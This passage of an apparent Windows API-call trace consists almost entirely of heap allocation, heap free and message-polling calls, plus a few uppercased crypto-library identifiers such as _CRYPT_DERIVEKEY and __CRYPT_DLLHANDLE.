out: hHeap=0x970000) returned 1 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0130.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0130.089] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0130.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.090] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.090] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0130.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0130.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0130.091] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0130.091] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0130.091] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0130.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0130.091] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0130.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0130.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0130.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0130.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0130.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0130.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0130.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0130.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0130.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0130.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0130.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0130.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0130.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0130.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0130.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0130.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0130.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0130.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.097] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0130.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.097] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.097] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0130.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0130.097] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0130.098] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0130.098] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0130.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0130.098] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.099] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.099] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0130.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0130.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0130.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0130.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.100] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 